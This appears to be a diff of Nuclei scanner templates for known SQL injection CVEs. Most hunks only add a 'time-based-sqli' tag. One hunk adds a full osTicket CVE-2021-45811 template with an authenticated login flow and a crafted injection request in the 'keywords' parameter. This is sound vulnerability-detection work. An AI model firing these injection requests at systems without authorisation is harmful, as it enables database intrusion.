# digest: 4a0a0047304502210080b4fd1ea8002928950a4be85999cc9bb3e3d35dd99ca34564c39556ae1544b002207c4249f959342254d0c492ed59ccd668a4925e63f456d78f2483e98a274c11b9:922c64590222798bb761d5b6d8e72950
# digest: 4a0a00473045022100d93679fda0ec3270f9aee76d52bf8e1ca48f00c51c65e7ead923cf9754051f3f02207f42cd9a38d4ccdc79c2d046b8a65f80379192372894f7c36a41c1072e0f7c51:922c64590222798bb761d5b6d8e72950

View File

@ -31,7 +31,7 @@ info:
- html:"AURALL"
- http.html:"aurall"
fofa-query: body="aurall"
tags: cve2021,cve,sqli,void,aurall
tags: time-based-sqli,cve2021,cve,sqli,void,aurall
http:
- raw:
@ -51,4 +51,4 @@ http:
- 'contains(content_type, "text/html")'
- 'contains(body, "Contacte con el administrador")'
condition: and
# digest: 4b0a00483046022100b913f246ed52547b6cf8d38eeb886a9c8e6ccdfd54a5fb9dfed931be1b37c98e022100f1d8901f4edf04df3a1e544f734cd3941996ac96dc7776e05744fcacf027eac5:922c64590222798bb761d5b6d8e72950
# digest: 4a0a0047304502200282e1486bd120a0f9c250940fd4924b958940ec669b60c7119709378b704265022100c7886cb6efe4950af5d454aff9e4fd05c0e5c757f09ae284b4f7d40d1d178d6c:922c64590222798bb761d5b6d8e72950

View File

@ -27,7 +27,7 @@ info:
max-request: 1
vendor: doctor_appointment_system_project
product: doctor_appointment_system
tags: cve2021,cve,sqli,doctor-appointment-system,packetstorm,doctor_appointment_system_project
tags: time-based-sqli,cve2021,cve,sqli,doctor-appointment-system,packetstorm,doctor_appointment_system_project
http:
- raw:
@ -46,4 +46,4 @@ http:
- 'status_code == 200'
- 'contains(body, "Doctor Appoinment System")'
condition: and
# digest: 490a0046304402207973d618635cb6ff182dd1151b2e15fef7b49ef6f6e99fbf1ef6b1f6f0f5cd64022038423bf061c1df525cfb84ab33d32f3681ff677745b0341ea30b995d34b637b5:922c64590222798bb761d5b6d8e72950
# digest: 4b0a004830460221009a413cfe8323f7b60e6d44eef643b270bce02d1a7d91553da330fa3d256b4f06022100d25274ea18a85655e67d4612c0615304e37f1047e76c2e150aea74baafdd8a36:922c64590222798bb761d5b6d8e72950

View File

@ -27,7 +27,7 @@ info:
max-request: 1
vendor: doctor_appointment_system_project
product: doctor_appointment_system
tags: cve2021,cve,sqli,doctor-appointment-system,packetstorm,doctor_appointment_system_project
tags: time-based-sqli,cve2021,cve,sqli,doctor-appointment-system,packetstorm,doctor_appointment_system_project
http:
- raw:
@ -46,4 +46,4 @@ http:
- 'status_code == 500'
- 'contains(body, "Medical Management System")'
condition: and
# digest: 4a0a004730450220608993eb6c162f41af6eca78ee5e37966f90692f167c67e2f39623c90a6af11d022100bab80bd88b7acfd20895fdd9f38e249825760da11586f3cb851af29d59def924:922c64590222798bb761d5b6d8e72950
# digest: 4a0a00473045022100e2cf3abe851fb2c16b60644bcc286522bbe51cc52155a0079a02e25595c667ca02200df7ed25d96d01b78bd1b26e3c448e057d73fea56e2e06342982e2008e85eaae:922c64590222798bb761d5b6d8e72950

View File

@ -27,7 +27,7 @@ info:
max-request: 1
vendor: doctor_appointment_system_project
product: doctor_appointment_system
tags: cve2021,cve,sqli,doctor-appointment-system,packetstorm,doctor_appointment_system_project
tags: time-based-sqli,cve2021,cve,sqli,doctor-appointment-system,packetstorm,doctor_appointment_system_project
http:
- raw:
@ -46,4 +46,4 @@ http:
- 'status_code == 500'
- 'contains(body, "Medical Management System")'
condition: and
# digest: 4a0a0047304502205af27187e0d2039416c9a8f9600f75e28215199929e4ad988cd03e84e61c370d022100c759b577ed0406b9390cffefba1486233e1f5ebcd24930bed0d401d54a95459e:922c64590222798bb761d5b6d8e72950
# digest: 490a0046304402202846631256391e911fe49c920be9b5c69fc171b1f19ad1ba982bdb67a2289b310220640c20f73f5c1f529fac4607b62fda57411a3ea82d53f2b4c0bf6d284926e49a:922c64590222798bb761d5b6d8e72950

View File

@ -27,7 +27,7 @@ info:
max-request: 1
vendor: doctor_appointment_system_project
product: doctor_appointment_system
tags: cve2021,cve,packetstorm,sqli,doctor-appointment-system,doctor_appointment_system_project
tags: time-based-sqli,cve2021,cve,packetstorm,sqli,doctor-appointment-system,doctor_appointment_system_project
http:
- raw:
@ -46,4 +46,4 @@ http:
- 'status_code == 500'
- 'contains(body, "Medical Management System")'
condition: and
# digest: 4b0a004830460221009797e9869eb4d890a89391acc0795035af747ff5958931398e1e077d3f751e79022100d9e31261c293f7762348e4477ec1478a4f49a059fc8e4f1f513e7cfb025edb9b:922c64590222798bb761d5b6d8e72950
# digest: 4b0a00483046022100fc3a47263f7babfff09eac1ce8a5de5ac19c63e853d4e90804da002880a18109022100c5e3852e81329ca6eb06f6e5779c1d722ac578ec4f74f73ca284c7ad67d367d5:922c64590222798bb761d5b6d8e72950

View File

@ -27,7 +27,7 @@ info:
max-request: 1
vendor: doctor_appointment_system_project
product: doctor_appointment_system
tags: cve2021,cve,sqli,doctor-appointment-system,packetstorm,doctor_appointment_system_project
tags: time-based-sqli,cve2021,cve,sqli,doctor-appointment-system,packetstorm,doctor_appointment_system_project
http:
- raw:
@ -46,4 +46,4 @@ http:
- 'status_code == 500'
- 'contains(body, "Medical Management System")'
condition: and
# digest: 4b0a00483046022100e19069ba819c51cbb906a921026dc33a3ea4777dfdfde261cd3eecc4bdf2f60b022100aaff811bc5771e0fa07652ec9066319676fe5ee3edf3f665b969a24c584788c3:922c64590222798bb761d5b6d8e72950
# digest: 490a004630440220153004a0e168cfb9d937164ef1e1d4085ca6f498cbe11e517f162873f2094f1f02207bc78cae2230febb403b765b6ae5f3a17b24fdbf2ea083a7672629a8fc420158:922c64590222798bb761d5b6d8e72950

View File

@ -30,7 +30,7 @@ info:
vendor: prestashop
product: prestashop
shodan-query: cpe:"cpe:2.3:a:prestashop:prestashop"
tags: cve,cve2021,sqli,prestshop,edb,prestashop
tags: time-based-sqli,cve,cve2021,sqli,prestshop,edb,prestashop
http:
- raw:
@ -47,4 +47,4 @@ http:
- 'contains(content_type, "application/json")'
- 'contains(body, "average_grade")'
condition: and
# digest: 490a0046304402204d4902f51f560fcf0ded1e355944479986a26099d29a7f3247c2c0a35fb533e402204b3ddd6af36676a8993b163161d15f67e560f97d3e61e4a0d1cd13004d189c64:922c64590222798bb761d5b6d8e72950
# digest: 4a0a00473045022017d64e2bcae0f187ce3857267bdda7bb3f7c956f2f6c62028916929f30883ffd022100c627319a056fd24f0bd2267d75af6075cc71aef79ef43d236a377a56d7c4f5dc:922c64590222798bb761d5b6d8e72950

View File

@ -31,7 +31,7 @@ info:
product: cachet
shodan-query: http.favicon.hash:-1606065523
fofa-query: icon_hash=-1606065523
tags: cve,cve2021,cachet,sqli,chachethq
tags: time-based-sqli,cve,cve2021,cachet,sqli,chachethq
http:
- raw:
@ -50,4 +50,4 @@ http:
- 'contains(content_type, "application/json")'
- 'contains(body, "pagination") && contains(body, "data")'
condition: and
# digest: 4a0a0047304502207d446c3957624653dc008a7ab15069eeed694d1099c94c6c977a81d0102dd05a022100d4e4d4f86b4d2f06d8966f18d607297ad2bc92f0fe4a9083ec4da8b419a74743:922c64590222798bb761d5b6d8e72950
# digest: 490a00463044022034663351e65790c6811b5d318fe212fedff9d5eac2aeb9c01e05122b56f7f0a302204e86e7e7ff57fe1b1e17e7e1e84b05165b4878951b171a7d025162d75e4dca52:922c64590222798bb761d5b6d8e72950

View File

@ -0,0 +1,68 @@
id: CVE-2021-45811
info:
name: osTicket 1.15.x - SQL Injection
author: ritikchaddha
severity: medium
description: |
A SQL injection vulnerability in the "Search" functionality of "tickets.php" page in osTicket 1.15.x allows authenticated attackers to execute arbitrary SQL commands via the "keywords" and "topic_id" URL parameters combination.
remediation: |
Upgrade osTicket to later version to mitigate this vulnerability.
reference:
- https://members.backbox.org/osticket-sql-injection/
- https://nvd.nist.gov/vuln/detail/CVE-2021-45811
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
cvss-score: 6.5
cve-id: CVE-2021-45811
cwe-id: CWE-89
cpe: cpe:2.3:a:osticket:osticket:*:*:*:*:*:*:*:*
metadata:
max-request: 3
vendor: osticket
product: osticket
shodan-query: title:"osTicket"
fofa-query: title="osticket"
google-query: intitle:"osticket"
tags: cve,cve2021,osticket,sqli,authenticated
flow: http(1) && http(2)
http:
- raw:
- |
GET /scp/login.php HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'contains(tolower(body), "osticket")'
internal: true
extractors:
- type: regex
name: csrftoken
part: body
group: 1
regex:
- '__CSRFToken__" value="(.*?)"'
internal: true
- raw:
- |
POST /scp/login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
__CSRFToken__={{csrftoken}}&do=scplogin&userid={{username}}&passwd={{password}}&ajax=1
- |
GET /tickets.php?a=search&keywords=text'+:1&topic_id=topic_id_val HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- contains_all(body_2, "FROM (SELECT", "topic_id_val\'\' IN NATURAL", "ORDER BY relevance")
# digest: 490a0046304402205cc02f7b820e5331fe9be93e73d2a1386287fc72bdc45ff952a4c37b8bda3866022030d6880a65c877c244a1b41bf61374798ab06cfb371593bd22ee05a96189a8bc:922c64590222798bb761d5b6d8e72950

View File

@ -29,7 +29,7 @@ info:
shodan-query: http.html:/wp-content/plugins/popup-builder/
fofa-query: body=/wp-content/plugins/popup-builder/
publicwww-query: /wp-content/plugins/popup-builder/
tags: cve2022,cve,wordpress,wp-plugin,wp,wpscan,popup-builder,sygnoos,sqli
tags: time-based-sqli,cve2022,cve,wordpress,wp-plugin,wp,wpscan,popup-builder,sygnoos,sqli
http:
- raw:
@ -52,4 +52,4 @@ http:
- 'contains_all(body_2, "first name", "last name", "email")'
- 'contains(content_type_2, "application/octet-stream")'
condition: and
# digest: 4b0a00483046022100a5e5bdb6821dc08d643eb1c9f95862b8116cf731542887e87ce5a5ed42b204700221008d7575ffb8f524c90d05db2e9bbd5e0ce26c0b8e227622602cd1f104061c73c2:922c64590222798bb761d5b6d8e72950
# digest: 4b0a00483046022100bf716bf9543e60115d96900d93a63ba1b0d62e7936b9c6a98688c71a43256702022100b8d5167cf275f82cfabcd3f5b016e33e9b8b36b5bd4a78d1a9cf1814ed8a453a:922c64590222798bb761d5b6d8e72950

View File

@ -30,7 +30,7 @@ info:
vendor: wpdeveloper
product: notificationx
framework: wordpress
tags: cve,cve2022,wordpress,wp-plugin,wp,sqli,notificationx,wpscan,wpdeveloper
tags: time-based-sqli,cve,cve2022,wordpress,wp-plugin,wp,sqli,notificationx,wpscan,wpdeveloper
http:
- raw:
@ -49,4 +49,4 @@ http:
- 'status_code == 200'
- 'contains(body, "\"data\":{\"success\":true}")'
condition: and
# digest: 4a0a00473045022066280e6a47e91352d98cb30291c051553c64ce566f4b4058a6b38c69f618dca2022100e774340b4d23c31810dcf915c1a593ca0237c07a9dfd39f79842b6feaca32ca3:922c64590222798bb761d5b6d8e72950
# digest: 4b0a00483046022100af31781e382fb73a08452401889431cc023d94e6e793e41597937b41cc2a5580022100fcbd14f71e6b2da2240a56aa46dbfaadcc3b3f8b279ba313effc07c87ad27b01:922c64590222798bb761d5b6d8e72950

View File

@ -30,7 +30,7 @@ info:
vendor: templateinvaders
product: ti_woocommerce_wishlist
framework: wordpress
tags: cve2022,cve,sqli,ti-woocommerce-wishlist,wpscan,woocommerce,wordpress,wp-plugin,wp,templateinvaders
tags: time-based-sqli,cve2022,cve,sqli,ti-woocommerce-wishlist,wpscan,woocommerce,wordpress,wp-plugin,wp,templateinvaders
http:
- raw:
@ -53,4 +53,4 @@ http:
- type: status
status:
- 400
# digest: 4b0a00483046022100b6e4d0f3cf3083a6266de8390edc1edef6d598356cfce15241e5e052a6bcf2ff022100b035a1ed11b0738ead2d5d28393b784c66d899fee448212efc636ff59b11add8:922c64590222798bb761d5b6d8e72950
# digest: 4a0a00473045022100bf6465b533da10a708e3590108af2902d2a31c0c163cf47151dd80876b90ecd902201150103e2c55f6df450110650eb092713f43dfb7372cd868af8565bb86621dde:922c64590222798bb761d5b6d8e72950

View File

@ -31,7 +31,7 @@ info:
fofa-query: body=/wp-content/plugins/wp-statistics/
publicwww-query: /wp-content/plugins/wp-statistics/
google-query: inurl:/wp-content/plugins/wp-statistics
tags: cve,cve2022,sqli,wp,wordpress,wp-plugin,wp-statistics,veronalabs
tags: time-based-sqli,cve,cve2022,sqli,wp,wordpress,wp-plugin,wp-statistics,veronalabs
http:
- raw:
@ -60,4 +60,4 @@ http:
regex:
- '_wpnonce=([0-9a-zA-Z]+)'
internal: true
# digest: 490a004630440220035f12a4154a350d60447d690b6c52d7ff3ec9d78006be2879d49e848dd1ddf10220529c5ae15af4a1889b7ccb1e505d046daf41c212c9ff5926ad7818f19e2f5c12:922c64590222798bb761d5b6d8e72950
# digest: 4b0a00483046022100e26860d278f256bcc846af089c9e6eb40d552ede910fbddb3c5619c1b9cf2969022100d2adf42556aee426785fa1e641f4bf677935e837fd990f2f24efda812ebde0c2:922c64590222798bb761d5b6d8e72950

View File

@ -27,7 +27,7 @@ info:
product: commonsbooking
framework: wordpress
google-query: inurl:/wp-content/plugin/commonsbooking/
tags: cve,cve2022,wordpress,wp-plugin,wp,commonsbooking,sqli,wpscan,wielebenwir
tags: time-based-sqli,cve,cve2022,wordpress,wp-plugin,wp,commonsbooking,sqli,wpscan,wielebenwir
http:
- raw:
@ -47,4 +47,4 @@ http:
- 'contains(header, "application/json")'
- 'contains(body, "partiallyBookedDays") && contains(body, "lockDays")'
condition: and
# digest: 4a0a00473045022100dea516f929140a2e2296985cd78a610dc540408796d4ac65fb462ea4200221ec02204757fe9ea8722ca648c35531743432d486f7d889c7b60b6529123bd0d7c443bd:922c64590222798bb761d5b6d8e72950
# digest: 4a0a004730450221009f6a62af9597b8c3d1910fadc250bad189b5a22c33e78d82e1a10b161f3572bc02205145b6a9ccf3b69a6a8bd23c1353e7ba90db663888256e6bd5ab81d8f64f7864:922c64590222798bb761d5b6d8e72950

View File

@ -30,7 +30,7 @@ info:
vendor: devbunch
product: master_elements
framework: wordpress
tags: cve2022,cve,unauth,wpscan,wp-plugin,wp,sqli,wordpress,master-elements,devbunch
tags: time-based-sqli,cve2022,cve,unauth,wpscan,wp-plugin,wp,sqli,wordpress,master-elements,devbunch
http:
- raw:
@ -46,4 +46,4 @@ http:
- 'status_code == 200'
- 'contains(body, "Post Meta Setting Deleted Successfully")'
condition: and
# digest: 490a0046304402204f01877da9668618a31c134174c0b1db2eeb1fd33ee26b77bdd0fed4b5a611dd02206407d8588548171f5e8dc630122584d4c228b43379770ceaa7dfd300e960c4e0:922c64590222798bb761d5b6d8e72950
# digest: 4a0a00473045022100e693d603ea6398215e74879c15e496047477f4343461046dac6e9ae027bde52902206665f561033c3f6a9d32e975ea9da5abffdb99689fb2c1b499ad084cb8702f25:922c64590222798bb761d5b6d8e72950

View File

@ -29,7 +29,7 @@ info:
vendor: quantumcloud
product: infographic_maker
framework: wordpress
tags: cve,cve2022,sqli,wordpress,wp-plugin,wp,infographic-and-list-builder-ilist,wpscan,quantumcloud
tags: time-based-sqli,cve,cve2022,sqli,wordpress,wp-plugin,wp,infographic-and-list-builder-ilist,wpscan,quantumcloud
http:
- raw:
@ -52,4 +52,4 @@ http:
- 'contains(content_type_2, "text/javascript")'
- 'contains(body_2, "show_ilist_templates")'
condition: and
# digest: 490a004630440220659dd6e81b56b7ad2ca5e164674d68e908074273a0e522aa11bbe64016520f3a02207cd44466e380af3765f85808195b17dc6e318a354fb70704520099f6e978103e:922c64590222798bb761d5b6d8e72950
# digest: 490a00463044022065454519399c9c6f45787b0ff07a1b1773963ffb30db52102b08645e7aee8dcd02205ea41986885d388e85018ef9d86da90d4b452efce0318bc0e0fb74cab0714064:922c64590222798bb761d5b6d8e72950

View File

@ -30,7 +30,7 @@ info:
vendor: quantumcloud
product: simple_link_directory
framework: wordpress
tags: cve,cve2022,sqli,wordpress,wp-plugin,wp,simple-link-directory,unauth,wpscan,quantumcloud
tags: time-based-sqli,cve,cve2022,sqli,wordpress,wp-plugin,wp,simple-link-directory,unauth,wpscan,quantumcloud
http:
- raw:
@ -50,4 +50,4 @@ http:
- 'contains(content_type, "text/html")'
- 'contains(body, "vote_status") || contains(body, "critical error")'
condition: and
# digest: 4a0a004730450221008335e1b503013fdf95af325dc2cd7775ecc4a69d509ffd7d9f3e058d0d0f0f36022040ddab9ea922ffdf58d0e2f057aad3e53d5c0ff7946897f4d3f3da3105c0776d:922c64590222798bb761d5b6d8e72950
# digest: 4a0a00473045022100de19f0c89c65bdd3d6e4f1ab16529ddcc17caef25172961832f4097889b0648b022066bcb91b91972cca839d631d32692be65ca3fb593a5bd40a879598c22aca1448:922c64590222798bb761d5b6d8e72950

View File

@ -30,7 +30,7 @@ info:
vendor: usersultra
product: users_ultra
framework: wordpress
tags: cve,cve2022,wp,users-ultra,wpscan,sqli,wordpress,wp-plugin,usersultra
tags: time-based-sqli,cve,cve2022,wp,users-ultra,wpscan,sqli,wordpress,wp-plugin,usersultra
http:
- raw:
@ -50,4 +50,4 @@ http:
- 'contains(content_type, "text/html")'
- 'contains(body, "You have to be logged in to leave your rate")'
condition: and
# digest: 4a0a0047304502202c86f8644cb483f5c622c81dc5f3c84f10db3835fa21a49497270c6ef42cc868022100d4fcdb326b1bb65c5056f8e677aad1fe82328ed18bc6d80f5890f2456e405b8e:922c64590222798bb761d5b6d8e72950
# digest: 4a0a00473045022051e07e9fad1853ad143f9747a2830720208c1b7d848b081c1877243a6b6a9cc7022100a79cf97012038bd6c899595add46debc31ddf60d43344074f6a7042defceebb1:922c64590222798bb761d5b6d8e72950

View File

@ -28,7 +28,7 @@ info:
vendor: documentor_project
product: documentor
framework: wordpress
tags: cve2022,cve,unauth,sqli,wp-plugin,wp,documentor-lite,wpscan,wordpress,documentor_project
tags: time-based-sqli,cve2022,cve,unauth,sqli,wp-plugin,wp,documentor-lite,wpscan,wordpress,documentor_project
http:
- raw:
@ -51,4 +51,4 @@ http:
- 'contains(content_type_1, "text/html")'
- 'contains(body_1, "([])") && contains(body_2, ".documentor-help")'
condition: and
# digest: 490a0046304402205f2cc03db340617761a1fa935180c834e2ffa82c932c1189a14dfcb1d06333f70220105b6b52747cdf5d6f4ad6ca85ab86c5cd0f844d3a8a8d75cec26b186467f283:922c64590222798bb761d5b6d8e72950
# digest: 490a0046304402204a297207b55918fa80abc7b2fabd54eebf93cc3e98c031b8fb74ab0b54739296022012e42fafada21fb35db7eab86787a32a560b2da932303f1ffe2a6967aaa1b1d7:922c64590222798bb761d5b6d8e72950

View File

@ -30,7 +30,7 @@ info:
vendor: title_experiments_free_project
product: title_experiments_free
framework: wordpress
tags: cve2022,cve,wpscan,wp-plugin,wp,sqli,wp-experiments-free,unauth,wordpress,title_experiments_free_project
tags: time-based-sqli,cve2022,cve,wpscan,wp-plugin,wp,sqli,wp-experiments-free,unauth,wordpress,title_experiments_free_project
http:
- raw:
@ -50,4 +50,4 @@ http:
- 'contains(content_type, "text/html")'
- 'contains(body, "{\"images\":")'
condition: and
# digest: 490a00463044021f1195a13a42ffdab24fe1a153051ee57e125fe5d1aa81e77333ae6af0d54794022100de53b58284ec8656a4b09537d5f58ff210002891439cc282e725071c8681e4bc:922c64590222798bb761d5b6d8e72950
# digest: 4a0a00473045022100b51bc538dbe9eb8b81c9a46c95f53fac7b85bbaf5684f20e891460214c539d0902203cd29b53302e0cc5fa161915570cc9de65b35f769c9d797445a00e3c0b8770eb:922c64590222798bb761d5b6d8e72950

View File

@ -30,7 +30,7 @@ info:
vendor: daily_prayer_time_project
product: daily_prayer_time
framework: wordpress
tags: cve2022,cve,sqli,wordpress,wp-plugin,unauth,daily-prayer-time-for-mosques,wpscan,wp,daily_prayer_time_project
tags: time-based-sqli,cve2022,cve,sqli,wordpress,wp-plugin,unauth,daily-prayer-time-for-mosques,wpscan,wp,daily_prayer_time_project
http:
- raw:
@ -47,4 +47,4 @@ http:
- 'contains(content_type, "text/html")'
- 'contains(body, "dptTimetable customStyles dptUserStyles")'
condition: and
# digest: 4a0a004730450220339f76f6589f61d951c6df49eebd9765622f4b1fc106f4f0baaa2c769568a0a2022100c9f4eb1905e780de95cb4f89bc8dcebc93ad8fa3134478bb83af9abf03ee8be7:922c64590222798bb761d5b6d8e72950
# digest: 490a004630440220378d854bb8f28e49f9e65a11242638788ce63730696c9a768b80cbcaf04f394f022024e9f6367047c59dd724b93deabe92095ec7fe5901c1ab72fa6f038b980d7bab:922c64590222798bb761d5b6d8e72950

View File

@ -30,7 +30,7 @@ info:
vendor: iqonic
product: kivicare
framework: wordpress
tags: cve,cve2022,sqli,kivicare-clinic-management-system,unauth,wordpress,wp-plugin,wp,wpscan,iqonic
tags: time-based-sqli,cve,cve2022,sqli,kivicare-clinic-management-system,unauth,wordpress,wp-plugin,wp,wpscan,iqonic
http:
- raw:
@ -47,4 +47,4 @@ http:
- 'contains(content_type, "text/html")'
- 'contains(body, "Doctor details")'
condition: and
# digest: 4a0a0047304502202a56024067a27384463e32cf94905a97b100cc76d3a7f2e0129ad457e5630b20022100bb7206169a39c10a0a38f769961c00d3cbb7a2b161ead9618270e7b6ace9395a:922c64590222798bb761d5b6d8e72950
# digest: 4b0a0048304602210094f4a84c32850306a9912fc54dab1cce497aca3ad31b35a4af79c06f7e653de3022100b93e017cc2bdde695bc9f40ec562bc59bdd7ebf2d10a39440bb4c61016adc704:922c64590222798bb761d5b6d8e72950

View File

@ -26,7 +26,7 @@ info:
vendor: limit_login_attempts_project
product: limit_login_attempts
framework: wordpress
tags: cve,cve2022,wpscan,sqli,wordpress,wp-plugin,wp,wp-limit-failed-login-attempts,limit_login_attempts_project
tags: time-based-sqli,cve,cve2022,wpscan,sqli,wordpress,wp-plugin,wp,wp-limit-failed-login-attempts,limit_login_attempts_project
http:
- raw:
@ -46,4 +46,4 @@ http:
- contains(header, "text/html")
- contains(body, 'iTotalDisplayRecords')
condition: and
# digest: 4a0a00473045022100df4f7156bb701e694be126c2abe6eb09e5622b1cead273ab0e888a73d87dce8a02206a9b7211d792d45b6daaee2e7c7258fb8bcae7c9f8266b6b0312c01be218ec65:922c64590222798bb761d5b6d8e72950
# digest: 4a0a0047304502202120fd60a49a9ad2129fa0c1295710b0b3936bd777ef6632dcfee0fbb09e8adb022100a0ab87653ba456f6b9e4a6dc4123ae9a8e976284a60c0ec8d08a06b6a6630794:922c64590222798bb761d5b6d8e72950

View File

@ -30,7 +30,7 @@ info:
vendor: wpmet
product: wp_fundraising_donation_and_crowdfunding_platform
framework: wordpress
tags: cve,cve2022,sqli,wordpress,wp-plugin,wp,wp-fundraising-donation,unauth,wpscan,wpmet
tags: time-based-sqli,cve,cve2022,sqli,wordpress,wp-plugin,wp,wp-fundraising-donation,unauth,wpscan,wpmet
http:
- raw:
@ -50,4 +50,4 @@ http:
- 'contains(content_type, "application/json")'
- 'contains(body, "Invalid payment.")'
condition: and
# digest: 4a0a0047304502203494c2230989c5f71f85250dd906fc72494d29c3e4bf6084791c65bb4734921a022100ecef4474e9c6722b9cfcab205809d07c8692763004fb0cd88d618ea14c276154:922c64590222798bb761d5b6d8e72950
# digest: 4a0a00473045022100ab157f53f7aeb426a1ae70c22aeeb3a2de7b551e5c584f23c48a6dbc9a5efdac022074d8b85768ec6026da338f19ce9836e2c0d546a9ab033bd53488a97a700402f1:922c64590222798bb761d5b6d8e72950

View File

@ -30,7 +30,7 @@ info:
vendor: wp-video-gallery-free_project
product: wp-video-gallery-free
framework: wordpress
tags: cve,cve2022,wp-plugin,wpscan,wordpress,wp,sqli,wp-video-gallery-free,unauth,wp-video-gallery-free_project
tags: time-based-sqli,cve,cve2022,wp-plugin,wpscan,wordpress,wp,sqli,wp-video-gallery-free,unauth,wp-video-gallery-free_project
http:
- raw:
@ -50,4 +50,4 @@ http:
- 'contains(content_type, "text/html")'
- 'contains(body, "Registred videos :")'
condition: and
# digest: 490a0046304402202a667e41a338568765d9f7aa1f4bdaba5ba1fe329f7e76d1604f88b8b15c86300220781f39a95fdbf7a898f37621269bdffe2dc51e93cfba278a4a03db4d358afdff:922c64590222798bb761d5b6d8e72950
# digest: 490a00463044022007b8f2b42d4f7135fb49e52ece5e0caea22a8e6dddbaca544b7ced5a362d095f02200b55556cfb540bccd8cf6e89af1fa4356eeb9804feb1ae98d7dffc72b3d49628:922c64590222798bb761d5b6d8e72950

View File

@ -30,7 +30,7 @@ info:
vendor: presspage
product: bestbooks
framework: wordpress
tags: cve,cve2022,sqli,wpscan,wordpress,wp-plugin,wp,bestbooks,unauthenticated,presspage
tags: time-based-sqli,cve,cve2022,sqli,wpscan,wordpress,wp-plugin,wp,bestbooks,unauthenticated,presspage
http:
- raw:
@ -49,4 +49,4 @@ http:
- 'status_code == 200'
- 'contains(body, "Account added successfully")'
condition: and
# digest: 4b0a00483046022100db95e6660d66b18ab8ce734b9b438e2a4d2626c8b35c7227bb18ddde1a18bcdc022100fb81b33fe69ad1b275eaf4390e07eeb8d34f9fc1035eb938f7f1be4fcb30a916:922c64590222798bb761d5b6d8e72950
# digest: 4a0a00473045022100fee8ac38bbeddcaed2a1ea3ab43d4905849b48bed184b5c52f5aee416f0785bc0220648f311af296481fbe909ccc6a77df5f8d6d3846b66856b566a2e83e74c59cc0:922c64590222798bb761d5b6d8e72950

Some files were not shown because too many files have changed in this diff Show More